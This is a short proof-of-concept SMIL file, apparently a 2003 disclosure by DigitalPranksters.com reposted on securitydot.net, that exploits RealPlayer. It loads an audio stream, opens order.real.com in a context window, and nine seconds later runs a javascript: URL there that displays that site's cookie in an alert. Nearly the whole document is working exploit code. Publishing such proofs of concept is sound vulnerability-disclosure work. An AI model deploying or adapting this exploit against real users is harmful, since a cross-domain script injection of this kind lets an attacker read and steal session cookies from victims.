// This SMIL file will read the cookie from
https://order.real.com/pt/order.html.
// The cookie will be read 9 seconds after the audio has begun.
<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
<head>
<meta name="title" content="DigitalPranksters.com
Proof of Concept"/>
<meta name="author"
content="DigitalPranksters.com"/>
<meta name="copyright" content="(c)2003
DigitalPranksters.com"/>
</head>
<body>
<audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio
/real/live.ram?service=vr">
<area href="https://order.real.com/pt/order.html"
begin="1s" external="true"
actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
<rn:param name="width" value="10"/>
<rn:param name="height" value="10"/>
</area>
<area href="javascript:alert('Hi there! I\'m a digital
prankster. I just read your cookie
from ' + document.domain +
' over the ' + location.protocol + '// protocol.\n\nThe value was:\n' +
document.cookie +
'\n\nHave a nice day.')"
begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
</audio>
</body>
</smil>
securitydot.net - 2003-08-28
|
